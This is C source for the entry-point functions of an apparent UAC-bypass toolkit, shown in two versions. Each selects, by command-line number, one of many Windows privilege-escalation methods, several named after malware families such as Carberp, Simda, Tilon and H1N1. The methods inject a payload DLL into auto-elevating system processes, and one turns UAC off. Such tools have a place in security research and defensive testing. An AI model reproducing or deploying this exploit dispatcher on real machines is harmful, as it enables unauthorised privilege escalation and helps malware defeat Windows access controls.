/* * ucmMain * * Purpose: * * Program entry point. * */ UINT ucmMain() { DWORD bytesIO, dwType, paramLen; WCHAR *p; WCHAR szBuffer[MAX_PATH + 1]; TOKEN_ELEVATION_TYPE ElevType; if (ucmInit() != ERROR_SUCCESS) { return ERROR_INTERNAL_ERROR; } //query windows version if (!supIsWindowsVersionOrGreater(HIBYTE(_WIN32_WINNT_WIN7), LOBYTE(_WIN32_WINNT_WIN7), 0)) { ucmShowMessage(TEXT("This Windows is unsupported.")); return ERROR_NOT_SUPPORTED; } ElevType = TokenElevationTypeDefault; if (!supGetElevationType(&ElevType)) { return ERROR_INVALID_ACCESS; } if (ElevType != TokenElevationTypeLimited) { ucmShowMessage(TEXT("Admin account with limited token required.")); return ERROR_NOT_SUPPORTED; } dwType = 0; bytesIO = 0; RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO); if (bytesIO == 0) { return ERROR_INVALID_DATA; } dwType = strtoul(szBuffer); switch (dwType) { case METHOD_SYSPREP1://cryptbase if (g_ldp.osver.dwBuildNumber > 9200) { if (ucmShowQuestion(UACFIX) == IDNO) return ERROR_UNSUPPORTED_TYPE; } break; case METHOD_SYSPREP2://shcore if (g_ldp.osver.dwBuildNumber != 9600) { if (ucmShowQuestion(UACFIX) == IDNO) return ERROR_UNSUPPORTED_TYPE; } break; case METHOD_SYSPREP3://dbgcore if (g_ldp.osver.dwBuildNumber != 10240) { if (ucmShowQuestion(UACFIX) == IDNO) return ERROR_UNSUPPORTED_TYPE; } break; case METHOD_OOBE://oobe service if (g_ldp.osver.dwBuildNumber >= 10548) { if (ucmShowQuestion(UACFIX) == IDNO) return ERROR_UNSUPPORTED_TYPE; } break; case METHOD_REDIRECTEXE: if (g_ldp.osver.dwBuildNumber > 9600) { if (ucmShowQuestion(UACFIX) == IDNO) return ERROR_UNSUPPORTED_TYPE; } #ifdef _WIN64 ucmShowMessage(WOW64WIN32ONLY); return ERROR_UNSUPPORTED_TYPE; #endif break; case METHOD_SIMDA: if (g_ldp.osver.dwBuildNumber >= 10136) { if (ucmShowQuestion(UACFIX) == IDNO) return ERROR_UNSUPPORTED_TYPE; } break; case METHOD_CARBERP: if (g_ldp.osver.dwBuildNumber >= 10147) { if (ucmShowQuestion(UACFIX) == IDNO) return ERROR_UNSUPPORTED_TYPE; } break; case METHOD_CARBERP_EX: if (g_ldp.osver.dwBuildNumber >= 10147) { if (ucmShowQuestion(UACFIX) == IDNO) return ERROR_UNSUPPORTED_TYPE; } break; case METHOD_TILON: if (g_ldp.osver.dwBuildNumber > 9200) { if (ucmShowQuestion(UACFIX) == IDNO) return ERROR_UNSUPPORTED_TYPE; } break; case METHOD_AVRF: if (g_ldp.osver.dwBuildNumber >= 10136) { if (ucmShowQuestion(UACFIX) == IDNO) return ERROR_UNSUPPORTED_TYPE; } break; case METHOD_WINSAT: if (g_ldp.osver.dwBuildNumber >= 10548) { if (ucmShowQuestion(UACFIX) == IDNO) return ERROR_UNSUPPORTED_TYPE; } break; case METHOD_SHIMPATCH: if (g_ldp.osver.dwBuildNumber > 9600) { if (ucmShowQuestion(UACFIX) == IDNO) return ERROR_UNSUPPORTED_TYPE; } #ifdef _WIN64 ucmShowMessage(WOW64WIN32ONLY); return ERROR_UNSUPPORTED_TYPE; #endif break; case METHOD_MMC: break; case METHOD_H1N1: if (g_ldp.osver.dwBuildNumber >= 10548) { if (ucmShowQuestion(UACFIX) == IDNO) return ERROR_UNSUPPORTED_TYPE; } break; case METHOD_GENERIC: break; } //prepare command for payload paramLen = 0; RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, ¶mLen); if (paramLen > 0) { if (dwType != METHOD_REDIRECTEXE) { supSetParameter((LPWSTR)&szBuffer, paramLen * sizeof(WCHAR)); } } switch (dwType) { case METHOD_SYSPREP1: case METHOD_SYSPREP2: case METHOD_SYSPREP3: case METHOD_OOBE: case METHOD_TILON: // // Since we are using injection and not using heavens gate/syswow64, we should ban usage under wow64. // #ifndef _DEBUG if (g_ldp.IsWow64) { ucmShowMessage(WOW64STRING); return ERROR_UNSUPPORTED_TYPE; } #endif if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) { OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r")); } break; // // Allow only in 32 version. // #ifndef _WIN64 case METHOD_REDIRECTEXE: case METHOD_SHIMPATCH: if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL), (paramLen != 0) ? szBuffer : NULL )) { OutputDebugString(TEXT("[UCM] AppCompat method called\n\r")); } break; #endif case METHOD_SIMDA: // // Since we are using injection and not using heavens gate, we should ban usage under wow64. // #ifndef _DEBUG if (g_ldp.IsWow64) { ucmShowMessage(WOW64STRING); return ERROR_UNSUPPORTED_TYPE; } #endif if (MessageBox(GetDesktopWindow(), TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."), PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES) { if (ucmSimdaTurnOffUac()) { OutputDebugString(TEXT("[UCM] Simda method called\n\r")); } } break; case METHOD_CARBERP: case METHOD_CARBERP_EX: if (dwType == METHOD_CARBERP) { //there is no migmiz in syswow64 in 8+ if ((g_ldp.IsWow64) && (g_ldp.osver.dwBuildNumber > 7601)) { ucmShowMessage(WOW64STRING); return ERROR_UNSUPPORTED_TYPE; } } if (dwType == METHOD_CARBERP_EX) { #ifndef _DEBUG if (g_ldp.IsWow64) { ucmShowMessage(WOW64STRING); return ERROR_UNSUPPORTED_TYPE; } #endif } if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) { OutputDebugString(TEXT("[UCM] Carberp method called\n\r")); } break; case METHOD_AVRF: #ifndef _DEBUG if (g_ldp.IsWow64) { ucmShowMessage(WOW64STRING); return ERROR_UNSUPPORTED_TYPE; } #endif if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) { OutputDebugString(TEXT("[UCM] AVrf method called\n\r")); } break; case METHOD_WINSAT: // // Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool. // if (g_ldp.IsWow64) { ucmShowMessage(LAZYWOW64UNSUPPORTED); return ERROR_UNSUPPORTED_TYPE; } if (g_ldp.osver.dwBuildNumber < 9200) { p = L"powrprof.dll"; } else { p = L"devobj.dll"; } if (ucmWinSATMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL), (g_ldp.osver.dwBuildNumber <= 10136))) { OutputDebugString(TEXT("[UCM] WinSAT method called\n\r")); } break; case METHOD_MMC: if (g_ldp.IsWow64) { ucmShowMessage(WOW64STRING); return ERROR_UNSUPPORTED_TYPE; } p = L"elsext.dll"; if (ucmMMCMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) { OutputDebugString(TEXT("[UCM] MMC method called\n\r")); } break; case METHOD_H1N1: if (g_ldp.IsWow64) { ucmShowMessage(WOW64STRING); return ERROR_UNSUPPORTED_TYPE; } if (ucmH1N1Method((CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) { OutputDebugString(TEXT("[UCM] H1N1 method called\n\r")); } break; case METHOD_GENERIC: if (g_ldp.IsWow64) { ucmShowMessage(WOW64STRING); return ERROR_UNSUPPORTED_TYPE; } p = L"ntwdblib.dll"; if (ucmGenericAutoelevation( METHOD_SQLSRV_TARGETAPP, p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) { OutputDebugString(TEXT("[UCM] Generic method called\n\r")); } break; } return ERROR_SUCCESS; }
/* * main * * Purpose: * * Program entry point. * */ VOID main() { BOOL IsWow64 = FALSE; DWORD bytesIO, dwType; WCHAR *p; WCHAR szBuffer[MAX_PATH + 1]; TOKEN_ELEVATION_TYPE ElevType; RTL_OSVERSIONINFOW osver; //verify system version RtlSecureZeroMemory(&osver, sizeof(osver)); osver.dwOSVersionInfoSize = sizeof(osver); RtlGetVersion(&osver); if (osver.dwBuildNumber < 7000) { MessageBox(GetDesktopWindow(), TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } ElevType = TokenElevationTypeDefault; if (!supGetElevationType(&ElevType)) { goto Done; } if (ElevType != TokenElevationTypeLimited) { MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."), PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } IsWow64 = supIsProcess32bit(GetCurrentProcess()); dwType = 0; bytesIO = 0; RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) { dwType = strtoul(szBuffer); switch (dwType) { case METHOD_SYSPREP: OutputDebugString(TEXT("[UCM] Sysprep\n\r")); if (osver.dwBuildNumber > 9200) { MessageBox(GetDesktopWindow(), WINPREBLUE, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } break; case METHOD_SYSPREP_EX: OutputDebugString(TEXT("[UCM] Sysprep_ex\n\r")); if (osver.dwBuildNumber < 9600) { MessageBox(GetDesktopWindow(), WINBLUEONLY, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } break; case METHOD_OOBE: OutputDebugString(TEXT("[UCM] Oobe\n\r")); break; case METHOD_REDIRECTEXE: OutputDebugString(TEXT("[UCM] AppCompat RedirectEXE\n\r")); #ifdef _WIN64 MessageBox(GetDesktopWindow(), WOW64WIN32ONLY, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; #endif break; case METHOD_SIMDA: OutputDebugString(TEXT("[UCM] Simda\n\r")); break; case METHOD_CARBERP: OutputDebugString(TEXT("[UCM] Carberp\n\r")); break; case METHOD_CARBERP_EX: OutputDebugString(TEXT("[UCM] Carberp_ex\n\r")); break; case METHOD_TILON: OutputDebugString(TEXT("[UCM] Tilon\n\r")); if (osver.dwBuildNumber > 9200) { MessageBox(GetDesktopWindow(), WINPREBLUE, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } break; case METHOD_AVRF: OutputDebugString(TEXT("[UCM] AVrf\n\r")); break; case METHOD_WINSAT: OutputDebugString(TEXT("[UCM] WinSAT\n\r")); break; case METHOD_SHIMPATCH: OutputDebugString(TEXT("[UCM] AppCompat Shim Patch\n\r")); #ifdef _WIN64 MessageBox(GetDesktopWindow(), WOW64WIN32ONLY, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; #endif break; } } switch (dwType) { case METHOD_SYSPREP: case METHOD_SYSPREP_EX: case METHOD_OOBE: case METHOD_TILON: // // Since we are using injection and not using heavens gate, we should ban usage under wow64. // #ifndef _DEBUG if (IsWow64) { MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } #endif if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) { OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r")); } break; // // Allow only in 32 version. // #ifndef _WIN64 case METHOD_REDIRECTEXE: case METHOD_SHIMPATCH: if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) { OutputDebugString(TEXT("[UCM] AppCompat method called\n\r")); } break; #endif case METHOD_SIMDA: // // Since we are using injection and not using heavens gate, we should ban usage under wow64. // #ifndef _DEBUG if (IsWow64) { MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } #endif if (MessageBox(GetDesktopWindow(), TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."), PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES) { if (ucmSimdaTurnOffUac()) { OutputDebugString(TEXT("[UCM] Simda method called\n\r")); } } break; case METHOD_CARBERP: case METHOD_CARBERP_EX: if (dwType == METHOD_CARBERP) { if (osver.dwBuildNumber > 9600) { MessageBox(GetDesktopWindow(), TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } //there is no migmiz in syswow64 in 8+ if ((IsWow64) && (osver.dwBuildNumber > 7601)) { MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } } if (dwType == METHOD_CARBERP_EX) { #ifndef _DEBUG if (IsWow64) { MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } #endif } if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) { OutputDebugString(TEXT("[UCM] Carberp method called\n\r")); } break; case METHOD_AVRF: #ifndef _DEBUG if (IsWow64) { MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } #endif if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) { OutputDebugString(TEXT("[UCM] AVrf method called\n\r")); } break; case METHOD_WINSAT: // // Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool. // if (IsWow64) { MessageBox(GetDesktopWindow(), TEXT("Use 32 bit version of this tool on 32 bit OS version"), PROGRAMTITLE, MB_ICONINFORMATION); goto Done; } if (osver.dwBuildNumber < 9200) { p = L"powrprof.dll"; } else { p = L"devobj.dll"; } if (ucmWinSATMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) { OutputDebugString(TEXT("[UCM] WinSAT method called\n\r")); } break; } Done: ExitProcess(0); }